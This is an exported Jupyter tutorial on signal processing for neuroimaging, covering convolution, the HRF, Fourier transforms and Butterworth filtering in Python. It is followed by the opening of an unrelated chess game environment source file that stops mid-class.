watch this optional [video](https://youtu.be/rea6M1oagmA).\n# \n# $dotproduct_{ab}=\\sum\\limits_{i=1}^n a_i b_i$\n# \n# Let's create some vectors of random numbers and see how the dot product works. First, the two vectors need to be of the same length.\n\n# In[9]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\na = np.random.randint(1,10,20)\nb = np.random.randint(1,10,20)\n\nplt.scatter(a,b)\nplt.ylabel('B', fontsize=18)\nplt.xlabel('A', fontsize=18)\nplt.title('Scatterplot', fontsize=18)\n\nprint('Dot Product: %s' % np.dot(a,b))\n\n\n# what happens when we make the two variables more similar? In the next example we add gaussian noise on top of one of the vectors. What happens to the dot product?\n\n# In[10]:\n\n\nb = a + np.random.randn(20)\nplt.scatter(a,b)\nplt.ylabel('B', fontsize=18)\nplt.xlabel('A', fontsize=18)\nplt.title('Scatterplot', fontsize=18)\n\nprint(f'Dot Product: {np.dot(a,b)}')\n\n\n# ### Convolution\n# Convolution in the time domain is an extension of the dot product in which the dot product is computed iteratively over time. One way to think about it is that one signal weights each time point of the other signal and then slides forward over time. Let's call the timeseries variable *signal* and the other vector the *kernel*. Importantly, for our purposes, the kernel will almost always be smaller than the signal, otherwise we would only have one scalar value afterwards.\n# \n# To gain an intuition of how convolution works, let's play with some data. First, let's create a time series of spikes. Then let's convolve this signal with a boxcar kernel.\n\n# In[11]:\n\n\nn_samples = 100\n\nsignal = np.zeros(n_samples)\nsignal[np.random.randint(0 ,n_samples, 5)] = 1\n\nkernel = np.zeros(10)\nkernel[2:8] = 1\n\nf,a = plt.subplots(ncols=2, figsize=(20,5))\na[0].plot(signal, linewidth=2)\na[0].set_xlabel('Time', fontsize=18)\na[0].set_ylabel('Signal Intensity', fontsize=18)\na[0].set_title('Signal ', fontsize=18)\na[1].plot(kernel, linewidth=2, color='red')\na[1].set_xlabel('Time', fontsize=18)\na[1].set_ylabel('Intensity', fontsize=18)\na[1].set_title('Kernel ', fontsize=18)\n\n\n# Notice how the kernel is only 10 samples long and the boxcar width is about 6 seconds, while the signal is 100 samples long with 5 single pulses.\n# \n# Now let's convolve the signal with the kernel by taking the dot product of the kernel with each time point of the signal. This can be illustrated by creating a matrix of the kernel shifted each time point of the signal.\n# \n# We will illustrate using a heatmap, where the change in the color reflects the intensity, that this is simply moving the boxcar kernel, which is 6 seconds in duration forward in time for each sample.\n\n# In[12]:\n\n\nshifted_kernel = np.zeros((n_samples, n_samples+len(kernel) - 1))\nfor i in range(n_samples):\n shifted_kernel[i, i:i+len(kernel)] = kernel\n\nplt.figure(figsize=(8, 8))\nplt.imshow(shifted_kernel, cmap='Reds')\nplt.xlabel('Time', fontsize=18)\nplt.ylabel('Time', fontsize=18)\nplt.title('Time Shifted Kernels', fontsize=18)\n\n\n# Now, let's take the dot product of the signal with this matrix. \n# \n# To refresh your memory from basic linear algebra. Matrix multiplication consists of taking the dot product of the signal vector with each row of this expanded kernel matrix. \n\n# In[13]:\n\n\nconvolved_signal = np.dot(signal, shifted_kernel)\n\nplt.figure(figsize=(12, 5))\nplt.plot(convolved_signal, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Signal convolved with boxcar kernel', fontsize=18)\n\n\n# You can see that after convolution, each spike has now become the shape of the kernel. Spikes that were closer in time, compound if the boxes overlap.\n# \n# Notice also how the shape of the final signal is the length of the combined signal and kernel minus one.\n\n# In[14]:\n\n\nprint(f\"Signal Length: {len(signal)}\")\nprint(f\"Kernel Length: {len(kernel)}\")\nprint(f\"Convolved Signal Length: {len(convolved_signal)}\")\n\n\n# this process of iteratively taking the dot product of the kernel with each timepoint of the signal and summing all of the values can be performed by using the convolution function from numpy `np.convolve`\n\n# In[15]:\n\n\nplt.figure(figsize=(12, 5))\nplt.plot(np.convolve(signal, kernel), linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Signal convolved with boxcar kernel', fontsize=18)\n\n\n# What happens if the spikes have different intensities, reflected by different heights?\n\n# In[16]:\n\n\nsignal = np.zeros(n_samples)\nsignal[np.random.randint(0,n_samples,5)] = np.random.randint(1,5,5)\n\nf,a = plt.subplots(nrows=2, figsize=(18,6), sharex=True)\na[0].plot(signal, linewidth=2)\na[0].set_ylabel('Intensity', fontsize=18)\na[0].set_title('Timeseries of spikes with varying intensities', fontsize=18)\na[1].plot(np.convolve(signal, kernel), linewidth=2)\na[1].set_ylabel('Intensity', fontsize=18)\na[1].set_title('Signal convolved with boxcar kernel', fontsize=18)\na[1].set_xlabel('Time', fontsize=18)\n\n\n# Now what happens if we switch out the boxcar kernel for something with a more interesting shape, say a hemodynamic response function? \n# \n# Here we will use a double gamma hemodynamic function (HRF) developed by Gary Glover. \n# \n# **Note**: If you haven't install nltools yet run `!pip install nltools`. You may need to restart your jupyter kernel as well.\n\n# In[17]:\n\n\nfrom nltools.external import glover_hrf\n\ntr = 2\nhrf = glover_hrf(tr, oversampling=20)\nplt.plot(hrf, linewidth=2, color='red')\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Hemodynamic Response Function', fontsize=18)\n\n\n# For this example, we oversampled the function to make it more smooth. In practice we will want to make sure that the kernel is the correct shape given our sampling resolution. Be sure to se the oversampling to 1. Notice how the function looks more jagged now?\n\n# In[18]:\n\n\nhrf = glover_hrf(tr, oversampling=1)\nplt.plot(hrf, linewidth=2, color='red')\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Hemodynamic Response Function', fontsize=18)\n\n\n# Now let's try convolving our event pulses with this HRF kernel.\n\n# In[19]:\n\n\nsignal = np.zeros(n_samples)\nsignal[np.random.randint(0,n_samples,5)] = np.random.randint(1,5,5)\n\nf,a = plt.subplots(nrows=2, figsize=(18,6), sharex=True)\na[0].plot(signal, linewidth=2)\na[1].plot(np.convolve(signal, hrf), linewidth=2)\na[0].set_ylabel('Intensity', fontsize=18)\na[0].set_title('Timeseries of spikes with varying intensities', fontsize=18)\na[1].set_ylabel('Intensity', fontsize=18)\na[1].set_xlabel('Time', fontsize=18)\na[1].set_title('Signal convolved with HRF kernel', fontsize=18)\n\n\n# If you are interested in a more detailed overview of convolution in the time domain, I encourage you to watch this [video](https://youtu.be/9Hk-RAIzOaw) by Mike X Cohen. For more details about convolution and the HRF function, see this [overview](https://practical-neuroimaging.github.io/on_convolution.html) using python examples. \n\n# ### Oscillations\n# \n# Ok, now let's move on to studying time-varying signals that have the shape of oscillating waves.\n# \n# Let's watch a short video by Mike X Cohen to get some more background on sine waves. Don't worry too much about the matlab code as we will work through similar Python examples in this notebook.\n\n# In[12]:\n\n\nfrom IPython.display import YouTubeVideo\n\nYouTubeVideo('9RvZXZ46FRQ')\n\n\n# Oscillations can be described mathematically as:\n# \n# $A\\sin(2 \\pi ft + \\theta)$\n# \n# where $f$ is the frequency or the speed of the oscillation described in the number of cycles per second - $Hz$. Amplitude $A$ refers to the height of the waves, which is half the distance of the peak to the trough. Finally, $\\theta$ describes the phase angle offset, which is in radians.\n# \n# Here we will plot a simple sine wave. Try playing with the different parameters (i.e., amplitude, frequency, & theta) to gain an intuition of how they each impact the shape of the wave.\n\n# In[20]:\n\n\nfrom numpy import sin, pi, arange\n\nsampling_freq = 500\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq)\namplitude = 5\nfreq = 5\ntheta = 0\n\nsimulation = amplitude * sin(2 * pi * freq * time + theta)\n\nplt.figure(figsize=(12, 5))\nplt.plot(time, simulation, linewidth=2)\nplt.title('Sine Wave', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\n\n\n# We can also see the impact of different parameters using interactive widgets. Here you can move the sliders to see the impact of varying the amplitude, frequency, and theta parameter on a sine wave. We also show the complex components of the sine wave in the right panel.\n\n# In[21]:\n\n\nfrom ipywidgets import interact, FloatSlider\nfrom numpy import sin, pi, arange, real, imag\n\ndef plot_oscillation(amplitude=5, frequency=5, theta=1):\n sampling_frequency=500\n time = arange(-1, 1 + 1/sampling_frequency, 1/sampling_frequency)\n simulation = amplitude * sin(2 * pi * frequency * time + theta)\n z = np.exp(1j*(2 * pi * frequency * time + theta))\n\n fig = plt.figure(figsize=(20, 4))\n gs = plt.GridSpec(1, 6, left=0.05, right=0.48, wspace=0.05)\n ax1 = fig.add_subplot(gs[0, :4])\n ax1.plot(time, simulation, linewidth=2)\n ax1.set_ylabel('Amplitude', fontsize=18)\n ax1.set_xlabel('Time', fontsize=18)\n ax2 = fig.add_subplot(gs[0, 5:], polar=True)\n ax2.plot(real(simulation), imag(simulation))\n plt.tight_layout()\n\ninteract(plot_oscillation, amplitude=FloatSlider(value=5, min=0, max=10, step=0.5),\n frequency=FloatSlider(value=5, min=0, max=10, step=0.5), \n theta=FloatSlider(value=0, min=-5, max=5, step=0.5))\n\n\n# Next we will generate a simulation combining multiple sine waves oscillating at different frequencies. \n\n# In[22]:\n\n\nsampling_freq = 500\n\nfreq = [3, 10, 5 ,15, 35]\namplitude = [5, 15, 10, 5, 7]\nphases = pi*np.array([1/7, 1/8, 1, 1/2, -1/4])\n\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq) \n\nsine_waves = []\nfor i,f in enumerate(freq):\n sine_waves.append(amplitude[i] * sin(2*pi*f*time + phases[i]))\nsine_waves = np.array(sine_waves)\n\n\nf,a = plt.subplots(nrows=5, ncols=1, figsize=(12,5), sharex=True)\nfor i,x in enumerate(freq):\n a[i].plot(sine_waves[i,:], linewidth=2)\na[0].set_title(\"Sine waves oscillating at different frequencies\", fontsize=18)\na[i].set_xlabel(\"Time\", fontsize=18)\nplt.tight_layout() \n\n\n# Let's add all of those signals together to get a more complex signal.\n\n# In[23]:\n\n\nplt.figure(figsize=(12,3))\nplt.plot(np.sum(sine_waves, axis=0), linewidth=2)\nplt.xlabel('Time', fontsize=18)\nplt.title(\"Sum of all of the sine waves\", fontsize=18)\nplt.xlabel(\"Time\", fontsize=18)\nplt.tight_layout()\n\n\n# What is the effect of changing the sampling frequency on our ability to measure these oscillations? Try dropping it to be very low (e.g., less than 70 hz.) Notice that signals will alias when the sampling frequency is below the nyquist frequency of a signal. To observe the oscillations, we need to be sampling at least two times for each oscillation cycle. This will result in a jagged view of the data, but we can still theoretically observe the frequency. Practically, higher sampling rates allow us to better observe the underlying signals.\n\n# In[24]:\n\n\nsampling_freq = 60\n\nfreq = [3, 10, 5 ,15, 35]\namplitude = [5, 15, 10, 5, 7]\nphases = pi*np.array([1/7, 1/8, 1, 1/2, -1/4])\n\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq) \n\nsine_waves = []\nfor i,f in enumerate(freq):\n sine_waves.append(amplitude[i] * sin(2*pi*f*time + phases[i]))\nsine_waves = np.array(sine_waves)\n\n\nf,a = plt.subplots(nrows=5, ncols=1, figsize=(12,5), sharex=True)\nfor i,x in enumerate(freq):\n a[i].plot(sine_waves[i,:], linewidth=2)\na[0].set_title(\"Sine waves oscillating at different frequencies\", fontsize=18)\na[i].set_xlabel(\"Time\", fontsize=18)\nplt.tight_layout() \n\n\nplt.figure(figsize=(12,3))\nplt.plot(np.sum(sine_waves, axis=0), linewidth=2)\nplt.title(\"Sum of all of the sine waves\", fontsize=18)\nplt.xlabel(\"Time\", fontsize=18)\nplt.tight_layout() \n\n\n# Notice the jagged lines for frequencies that are above the nyquist frequency? That's because we don't have enough samples to accurately see the oscillations.\n# \n# \n# Ok, let's increase the sampling frequency to remove the aliasing. We can add a little bit of gaussian (white) noise on top of this signal to make it even more realistic. Try varying the amount of noise by adjusting the scaling on the noise. \n\n# In[25]:\n\n\nsampling_freq = 500\n\nfreq = [3, 10, 5 ,15, 35]\namplitude = [5, 15, 10, 5, 7]\nphases = pi*np.array([1/7, 1/8, 1, 1/2, -1/4])\n\ntime = arange(-1, 1 + 1/sampling_freq, 1/sampling_freq) \n\nsine_waves = []\nfor i,f in enumerate(freq):\n sine_waves.append(amplitude[i] * sin(2*pi*f*time + phases[i]))\nsine_waves = np.array(sine_waves)\n\n\nnoise = 5 * np.random.randn(sine_waves.shape[1])\nsignal = np.sum(sine_waves,axis=0) + noise\n\nplt.figure(figsize=(12,3))\nplt.plot( signal, linewidth=2)\nplt.title(\"Sum of sine waves plus white noise\", fontsize=18)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\n\n\n# ## Time & Frequency Domains\n# We have seen above how to represent signals in the time domain. However, these signals can also be represented in the frequency domain.\n# \n# Let's get started by watching a short video by Mike X Cohen to get an overview of how a signal can be represented in both of these different domains.\n\n# In[19]:\n\n\nYouTubeVideo('fYtVHhk3xJ0')\n\n\n# ## Frequency Domain\n# \n# In the previous example, we generated a complex signal composed of multiple sine waves oscillating at different frequencies. Typically in data analysis, we only observe the signal and are trying to uncover the generative processes that gave rise to the signal. In this section, we will introduce the frequency domain and how we can identify if there are any frequencies oscillating at a consistent frequency in our signal using the fourier transform. The fourier transform is essentially convolving different frequencies of sine waves with our data.\n# \n# One important assumption to note is that the fourier transformations assume that your oscillatory signals are stationary, which means that the generative processes giving rise to the oscillations do not vary over time. \n# \n# See this [video](https://youtu.be/rea6M1oagmA) for a more in depth discussion on stationarity. In practice, this assumption is rarely true. Often it can be useful to use other techniques such as wavelets to look at time x frequency representations. We will not be covering wavelets here, but see this series of [videos](https://youtu.be/7ahrcB5HL0k) for more information.\n\n# ### Discrete Time Fourier Transform\n# We will gain an intution of how the fourier transform works by building our own discrete time fourier transform. \n# \n# Let's watch this short video about the fourier transform by Mike X Cohen. Don't worry too much about the details of the discussion on the matlab code as we will be exploring these concepts in python below.\n\n# In[20]:\n\n\nYouTubeVideo('_htCsieA0_U')\n\n\n# The discrete Fourier transform of variable $x$ at frequency $f$ can be defined as:\n# \n# $X_f = \\sum\\limits_{k=0}^{n-1} x_k \\cdot e^\\frac{-i2\\pi fk}{n}$\n# where $n$ refers to the number of data points in vector $x$, and the capital letter $X_f$ is the fourier coefficient of time series variable $x$ at frequency $f$.\n# \n# Essentially, we create a bank of complex sine waves at different frequencies that are linearly spaced. The zero frequency component reflects the mean offset over the entire signal and will simply be zero in our example.\n\n# #### Complex Sine Waves\n# You may have noticed that we are computing *complex* sine waves using the `np.exp` function instead of the `np.sin` function. \n# \n# $$\\text{complex sine wave} = e^{i(2\\pi ft + \\theta)}$$\n# \n# We will not spend too much time on the details, but basically complex sine waves have three components: time, a real part of the sine wave, and the imaginary part of the sine wave, which are basically phase shifted by $\\frac{\\pi}{2}$. \n# `1j` is how we can specify a complex number in python. We can extract the real components using `np.real` or the imaginary using `np.imag`. \n# \n# We can visualize complex sine waves in three dimensions. For more information, watch this [video](https://youtu.be/iZCDOuzfsY0). If you need a refresher on complex numbers, you may want to watch this [video](https://youtu.be/fNfXKiIIufY).\n# \n# In this plot we show this complex signal in 3 dimensions and also project on two dimensional planes to show that the real and imaginary create a unit circle, and are phase offset by $\\frac{\\pi}{2}$ with respect to time.\n\n# In[26]:\n\n\nfrom mpl_toolkits import mplot3d\n\nfrequency = 5\nz = np.exp(1j*(2 * pi * frequency * time + theta))\n\nfig= plt.figure(figsize=(15, 10))\nax = fig.add_subplot(2, 2, 1, projection='3d')\nax.plot(np.arange(0, len(time))/sampling_freq, real(z), imag(z))\nax.set_xlabel('Time (sec)', fontsize=16)\nax.set_ylabel('Real(z)', fontsize=16)\nax.set_zlabel('Imaginary(z)', fontsize=16)\nax.set_title('Complex Sine Wave', fontsize=18)\nax.view_init(15, 250)\n\nax = fig.add_subplot(2, 2, 2)\nax.plot(real(z), imag(z))\nax.set_xlabel('Real(z)', fontsize=16)\nax.set_ylabel('Imaginary(z)', fontsize=16)\nax.set_title('Projecting on Real and Imaginary', fontsize=18)\n\nax = fig.add_subplot(2, 2, 3)\nax.plot(np.arange(0, len(time))/sampling_freq, real(z))\nax.set_xlabel('Time (sec)', fontsize=16)\nax.set_ylabel('Real(z)', fontsize=16)\nax.set_title('Projecting on Real and Time', fontsize=18)\n\nax = fig.add_subplot(2, 2, 4,)\nax.plot(np.arange(0, len(time))/sampling_freq, imag(z))\nax.set_xlabel('Time (sec)', fontsize=16)\nax.set_ylabel('Imaginary(z)', fontsize=16)\nax.set_title('Projecting on Imaginary and Time', fontsize=18)\nplt.tight_layout()\n\n\n# #### Create a filter bank\n# Ok, now let's create a bank of n-1 linearly spaced complex sine waves and plot first 5 waves to see their frequencies.\n# \n# Remember the first basis function is zero frequency component and reflects the mean offset over the entire signal.\n\n# In[27]:\n\n\nimport numpy as np\nfrom numpy import exp\n\ntime = np.arange(0, len(signal), 1)/len(signal)\n\nsine_waves = []\nfor i in range(len(signal)):\n sine_waves.append(exp(-1j*2*pi*i*time))\nsine_waves = np.array(sine_waves)\n\nf,a = plt.subplots(nrows=5, figsize=(12,8), sharex=True)\nfor i in range(0,5):\n a[i].plot(sine_waves[i,:], linewidth=2)\na[0].set_title('Bank of sine waves', fontsize=18)\na[i].set_xlabel('Time', fontsize=18)\nplt.tight_layout()\n\n\n# We can visualize all of the sine waves simultaneously using a heatmap representation. Each row is a different sine wave, and columns reflect time. The intensity of the value is like if the sine wave was coming towards and away rather than up and down. Notice how it looks like that the second half of the sine waves appear to be a mirror image of the first half. This is because the first half contain the *positive* frequencies, while the second half contains the *negative* frequencies. Negative frequencies capture sine waves that travel in reverse order around the complex plane compared to that travel forward. This becomes more relevant with the hilbert transform, but for the purposes of this tutorial we will be ignoring the negative frequencies.\n\n# In[28]:\n\n\nplt.figure(figsize = (12, 12))\nplt.imshow(np.real(sine_waves))\nplt.ylabel('Frequency', fontsize=18)\nplt.xlabel('Time', fontsize=18)\n\n\n# #### Estimate Fourier Coefficients\n# \n# Now let's take the dot product of each of the sine wave basis set with our signal to get the fourier coefficients. \n# \n# We can *scale* the coefficients to be more interpretable by dividing by the number of time points and multiplying by 2. Watch this [video](https://youtu.be/Ee9btm3tros) if you're interested in a more detailed explanation. Basically, this only needs to be done if you want the amplitude to be in the same units as the original data. In practice, this scaling factor will not change your interpretation of the spectrum.\n\n# In[29]:\n\n\nfourier = 2*np.dot(signal, sine_waves)/len(signal)\n\n\n# #### Visualizing Fourier Coefficients\n# \n# Now that we have computed the fourier transform, we might want to examine the results. The fourier transform provides a 3-D representation of the data including frquency, power, and phase. Typically, the phase information is ignored when plotting the results of a fourier analysis. The traditional way to view the information is plot the data as amplitude on the *y-axis* and frequency on the *x-axis*. We will extract amplitude by taking the absolute value of the fourier coefficients. Remember that we are only focusing on the positive frequencies (the 1st half of the sine wave basis functions).\n# \n# Here the x axis simply reflects the index of the frequency. The actual frequency is $N/2 + 1$ as we are only able estimate frequencies that are half the sampling frequency, this is called the Nyquist frequency. Also, note that we are only plotting the first half of the frequencies. This is because we are only plotting the *positive* frequencies. We will ignore frequencies above the nyquist frequency (i.e., $\\frac{\\text{fs}}{2}$), which are called negative frequencies. Watch this [video](https://youtu.be/Nupda1rm01Y) if you'd like more information about why. \n# \n# Watch this [video](https://youtu.be/oh7WvhlkxnU) to hear more about frequencies and zero padding.\n# \n\n# In[30]:\n\n\nplt.figure(figsize=(12, 5))\nplt.plot(np.abs(fourier[0:int(np.ceil(len(fourier)/2))]), linewidth=2)\nplt.xlabel('Frequency (index)', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\nplt.title('Power spectrum derived from discrete fourier transform', fontsize=18)\n\n\n# Notice that there are 5 different frequencies that have varying amplitudes. Recall that when we simulated this data we added 5 different sine waves with different frequencies and amplitudes. \n# \n# `freq = [3, 10, 5 ,15, 35]`\n# `amplitude = [5, 15, 10, 5, 7]`\n# \n# Let's zoom in a bit more to see this more clearly and also add the correct frequency labels in $Hz$. We will use the numpy `fftfreq` function to help convert frequency indices to $Hz$.\n\n# In[31]:\n\n\nfrom numpy.fft import fftfreq\n\nfreq = fftfreq(len(signal),1/sampling_freq)\n\nplt.figure(figsize=(12,5))\nplt.plot(freq[:80], np.abs(fourier)[0:80], linewidth=2)\nplt.xlabel('Frequency (Hz)', fontsize=18)\nplt.ylabel('Amplitude', fontsize=18)\nplt.title('Power spectrum derived from discrete fourier transform', fontsize=18)\n\n\n# Ok, now that we've created our own discrete fourier transform, let's learn a few more important details that are important to consider.\n\n# In[27]:\n\n\nYouTubeVideo('RHjqvcKVopg')\n\n\n# ### Inverse Fourier Transform\n# \n# The fourier transform allows you to represent a time series in the frequency domain. This is a lossless operation, meaning that no information in the original signal is lost by the transform. This means that we can reconstruct the original signal by inverting the operation. Thus, we can create a time series with only the frequency domain information using the *inverse fourier transform*. Watch this [video](https://youtu.be/HFacSL--vps) if you would like a more in depth explanation.\n# \n# $x_k = \\sum\\limits_{k=0}^{n-1} X_f \\cdot e^\\frac{i2\\pi fk}{n}$\n# \n# Notice that we are computing the dot product between the complex sine wave and the fourier coefficients $X$ instead of the time series data $x$.\n\n# In[32]:\n\n\nplt.figure(figsize=(12,5))\nplt.plot(np.dot(fourier, sine_waves)/2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Reconstructed Time Series Signal', fontsize=18)\n\n\n# ### Fast Fourier Transform\n# \n# The discrete time fourier transform is useful to understand the relationship between the time and frequency domains. However, in practice this method is rarely used as there are more faster and efficient methods to perform this computation. One popular algorithm is called the fast fourier transform (FFT). This function is also in numpy `np.fft.fft`. Don't forget to divide by the number of samples to keep the scaling.\n\n# In[29]:\n\n\nfrom numpy.fft import fft, ifft, fftfreq\n\nfourier_fft = fft(signal)\n\nplt.figure(figsize=(12,5))\nplt.plot((np.arange(0,80)/2), 2*np.abs(fourier_fft[0:80])/len(signal), linewidth=2)\nplt.ylabel('Amplitude', fontsize=18)\nplt.xlabel('Frequency (Hz)', fontsize=18)\nplt.title('Frequency domain representation of signal derived from fast fourier transform', fontsize=18)\n\n\n# We can also use the `ifft` to perform an inverse fourier transform. \n\n# In[30]:\n\n\nplt.figure(figsize=(12, 5))\nplt.plot(ifft(fourier_fft), linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.title('Reconstructed Time Series Signal', fontsize=18)\n\n\n# ### Convolution Theorem\n# Convolution in the time domain is the same as multiplication in the frequency domain. This means that time domain convolution computations can be performed much more efficiently in the frequency domain via simple multiplication. (The opposite is also true that multiplication in the time domain is the same as convolution in the frequency domain. Watch this [video](https://youtu.be/hj7j4Q8T3Ck) for an overview of the convolution theorem and convolution in the frequency domain.\n# \n# ![ConvolutionTheorem.png](../images/signal_processing/ConvolutionTheorem.png)\n\n# ## Filters\n# \n# Filters can be classified as finite impulse response (FIR) or infinite impulse response (IIR). These terms describe how a filter responds to a single input impulse. FIR filters have a response that ends at a discrete point in time, while IIR filters have a response that continues indefinitely.\n# \n# Filters are constructed in the frequency domain and have several properties that need to be considered.\n# \n# - ripple in the pass-band\n# - attenuation in the stop-band\n# - steepness of roll-off\n# - filter order (i.e., length for FIR filters)\n# - time-domain ringing\n# \n# In general, there is a frequency by time tradeoff. The sharper something is in frequency, the broader it is in time, and vice versa.\n# \n# Here we will use IIR butterworth filters as an example.\n\n# ### High Pass\n# High pass filters only allow high frequency signals to remain, effectively *removing* any low frequency information.\n# \n# Here we will construct a high pass butterworth filter and plot it in frequency space.\n# \n# **Note**: this example requires using scipy 1.2.1+.\n\n# In[31]:\n\n\nfrom scipy.signal import butter, filtfilt, freqz\n\nfilter_order = 3\nfrequency_cutoff = 25\nsampling_frequency = 500\n\n# Create the filter\nb, a = butter(filter_order, frequency_cutoff, btype='high', output='ba', fs=sampling_frequency)\n\ndef rad_sample_to_hz(x, fs):\n return (x*fs)/(2*np.pi)\n\ndef plot_filter(b, a, fs):\n plt.figure(figsize=(20,5))\n w, h = freqz(b, a, worN=512*2, whole=False)\n plt.plot(rad_sample_to_hz(w, fs), abs(h), linewidth=3)\n plt.ylabel('Gain', fontsize=18)\n plt.xlabel('Frequency', fontsize=18)\n \nplot_filter(b, a, sampling_frequency)\n\n\n# Notice how the gain scales from [0,1]? Filters can be multiplied by the FFT of a signal to apply the filter in the frequency domain. When the resulting signal is transformed back in the time domain using the inverse FFT, the new signal will be filtered. This can be much faster than applying filters in the time domain.\n# \n# The filter_order parameter adjusts the sharpness of the cutoff in the frequency domain. Try playing with different values to see how it changes the filter plot.\n\n# In[32]:\n\n\nfilter_order = 2\nfrequency_cutoff = 25\nsampling_frequency = 500\n\n\nb, a = butter(filter_order, frequency_cutoff, btype='high', output='ba', fs=sampling_frequency) \n\nplot_filter(b, a, sampling_frequency)\n\n\n# What does the filter look like in the temporal domain? Let's take the inverse FFT and plot it to see what it looks like as a kernel in the temporal domain. Notice how changing the filter order adds more ripples in the time domain.\n\n# In[33]:\n\n\nfrom scipy.signal import sosfreqz\n\nfilter_order = 8\nsos = butter(filter_order, frequency_cutoff, btype='high', output='sos', fs=sampling_frequency) \nw_sos, h_sos = sosfreqz(sos)\n\nplt.plot(ifft(h_sos)[0:100], linewidth=3)\nplt.ylabel('Amplitude', fontsize=18)\nplt.xlabel('Time', fontsize=18)\n\n\n# Now let's apply the filter to our data. We will be applying the filter to the signal in the time domain using the `filtfilt` function. This is a good default option, even though there are several other functions to apply the filter. `filtfilt` applies the filter forward and then in reverse ensuring that there is zero-phase distortion.\n\n# In[34]:\n\n\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# ### Low Pass\n# Low pass filters only retain low frequency signals, which *removes* any high frequency information.\n\n# In[35]:\n\n\nfrom scipy.signal import butter, filtfilt\n\nfilter_order = 2 \nfrequency_cutoff = 10\nsampling_frequency = 500\n\n# Create the filter\nb, a = butter(filter_order, frequency_cutoff, btype='low', output='ba', fs=sampling_frequency)\n\n# Apply the filter\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=4)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# What does the filter look like?\n\n# In[36]:\n\n\nfilter_order = 10\nfrequency_cutoff = 10\nsampling_frequency = 500\n\n# Create the filter\nb, a = butter(filter_order, frequency_cutoff, btype='low', output='ba', fs=sampling_frequency)\n\nplot_filter(b, a, sampling_frequency)\n\n\n# ### Bandpass\n# \n# Bandpass filters permit retaining only a specific frequency. Morlet wavelets are an example of a bandpass filter. or example a Morlet wavelet is a gaussian with the peak frequency at the center of a bandpass filter.\n# \n# Let's try selecting removing specific frequencies\n\n# In[37]:\n\n\nfilter_order = 2 \nlowcut = 7\nhighcut = 13\n\n# Create the filter\nb, a = butter(filter_order, [lowcut, highcut], btype='bandpass', output='ba', fs=sampling_frequency)\n\n# Apply the filter\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=4)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# ### Band-Stop\n# Bandstop filters remove a specific frequency from the signal\n\n# In[38]:\n\n\nfilter_order = 2 \nlowcut = 8\nhighcut = 12\n\n# Create the filter\nb,a = butter(filter_order, [lowcut, highcut], btype='bandstop', output='ba', fs=sampling_frequency)\n\n# Plot the filter\nplot_filter(b, a, sampling_frequency)\n\n# Apply the filter\nfiltered = filtfilt(b, a, signal)\n\nplt.figure(figsize=(20,5))\nplt.plot(signal, linewidth=2)\nplt.plot(filtered, linewidth=2)\nplt.ylabel('Intensity', fontsize=18)\nplt.xlabel('Time', fontsize=18)\nplt.legend(['Original','Filtered'], fontsize=18)\n\n\n# ## Exercises\n# \n# ### Exercise 1. Create a simulated time series with 7 different frequencies with noise\n\n# In[ ]:\n\n\n\n\n\n# ### Exercise 2. Show that you can identify each signal using a FFT\n\n# In[ ]:\n\n\n\n\n\n# ### Exercise 3. Remove one frequency with a bandstop filter\n\n# In[ ]:\n\n\n\n\n\n# ### Exercise 4. Remove frequency with a bandstop filter in the frequency domain and reconstruct the signal in the time domain with the frequency removed and compare it to the original\n\n# In[ ]:\n\n\n\n\n","repo_name":"ljchang/dartbrains","sub_path":"_build/jupyter_execute/content/Signal_Processing.py","file_name":"Signal_Processing.py","file_ext":"py","file_size_in_byte":33260,"program_lang":"python","lang":"en","doc_type":"code","stars":90,"dataset":"github-code","pt":"78"} +{"seq_id":"8078063915","text":"from __future__ import print_function\nimport sys\nimport time\n\nsys.path.append('')\nfrom Game import Game\n\nimport numpy as np\nimport chess\nimport chess.svg\n\n\ndef to_np(board):\n a = [0] * (8 * 8 * 6)\n for sq, pc in board.piece_map().items():\n a[sq * 6 + pc.piece_type - 1] = 1 if pc.color else -1\n return np.array(a)\n\n\ndef from_move(move):\n return move.from_square * 64 + move.to_square\n\n\ndef to_move(action):\n to_sq = action % 64\n from_sq = int(action / 64)\n return chess.Move(from_sq, to_sq)\n\n\ndef who(turn):\n return 1 if turn else -1\n\n\ndef mirror_move(move):\n return chess.Move(chess.square_mirror(move.from_square), chess.square_mirror(move.to_square))\n\n\nCHECKMATE = 1\nSTALEMATE = 2\nINSUFFICIENT_MATERIAL = 3\nSEVENTYFIVE_MOVES = 4\nFIVEFOLD_REPETITION = 5\nFIFTY_MOVES = 6\nTHREEFOLD_REPETITION = 7\n\n\nclass ChessGame(Game):\n\n def __init__(self, n=8):\n 